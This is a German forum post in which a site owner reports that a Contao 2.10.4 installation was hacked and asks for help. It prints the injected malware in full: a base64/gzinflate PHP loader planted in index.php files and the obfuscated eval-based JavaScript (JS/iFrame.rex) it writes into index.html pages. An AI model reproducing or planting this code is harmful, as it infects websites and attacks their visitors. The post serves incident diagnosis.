Contao 2.10.4 gehackt - JS/iFrame.rex
Hallo,
ich habe mir schon die Wiki durchgelesen (http://de.contaowiki.org/Contao_gehackt).
Und kann im Moment nichts auszuschließen. Passiert ist es wahrscheinlich am 09.05.2012.
Hoster - Hostway, benutzt wird leider keine sftp verbindung.
Infiziert waren mehrere index.php Dateien im Ordner typolight,contao, sowie manche index.html files in system/html, system/scripts
im root index.php
PHP-Code:
#f071c3#
echo(gzinflate(base64_decode("zVZbb5swFP4tgwegiDQ2Npe5bA/RfsEeozykCRSqNARwWy1R//t8fKEkbVJWbdIkLub4nPOdO77pVm214994++vQZOt69fiQb/lk1eZLnv/Y5PDlWuvqyfJYM1nudvl2PSurzdptfEvQXlZLvird5tk7lFkwRfiashdQtmtrXvNfu9yw3Lb5besdOp795G21vWP7feYsN45875+cSfd42/HWRTgMEMaev9+zrsvmC1ZkTtE6vlM/iMesdFjhC8l2phbNXb3OnbmlxK2FSwLsseeMl1XH8ux5Xgz2EAK9C7bNrHBCbbgpgsfURtRGqU1SmxJBIAlQY3gAE0lhRQTFxlhw96TYDqWSUH+fMNMIUIQEkAiyidQI4mGiP3oJgY4SCa1NSJWYJCKpAMhYQFFDiUAV1Z6cekSjUwhBARRY4uREMgIpZBhDZboy7AzOuFglClcZFb+6Gtk4vWAqosoC2AEVuA8FRTKy4gIvBAbsYhNXkxaAjLQTsTJWvoVJyl5i4FR8qbYUacdiwHkFxaEKfc+MNBIywMqsCxKRNiwd1MvAq0TrinorDCXsg0dV5iSWNlReKuAqpca1Xo90pfcY2HREEs1ENEg8yJDSZap6Kl1LwB21EWspOqRKP8Ip5FXl42xyBROKLtXhkCDRlekkeccfNLLi3+8V04aR1CPHAE5NJ4yob6LrW1LJMIQXB4Np9gsN0Le9CtFUdlM0nDwmu3HfYJDT+KTRkslJK6nyRP+ym94z+03t4z8p+qP2f1v7yqcRiB+3R4/0cZeMRj1upMGMGK9i0HIfyn+mQt5Ov6M6OR5nf6ssz0zRUcif+hv9D39uaJpYj+pXTCEU4kF9S8NANQyls5PSmrtu7n23OuurOI751s7yrU3FxVHHWtr95qPeNacgz2NF3bpVFgU4QHCzKqAk/ZJNWeX73uE+q1hVuB33xBGs6/yOT4q2fpiV4tgljltugK7KKxf56Go7v18IdS+NYGO524jlzbU+VP4G")));
#/f071c3#
index.html
Es wird daraus ein javascript:
HTML-Code:
<!--f071c3--><script>try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+=(h)?'ode':"";w=this;e=w[f["s"+"ubstr"](11)+zz];n="3.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-565!=0;i++){j=i;ss=ss+String.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}</script><!--/f071c3-->
Ich denke das ist ein Virus, der die Daten durch FTP (Filezilla) infiziert.
Danke für jede Hilfe!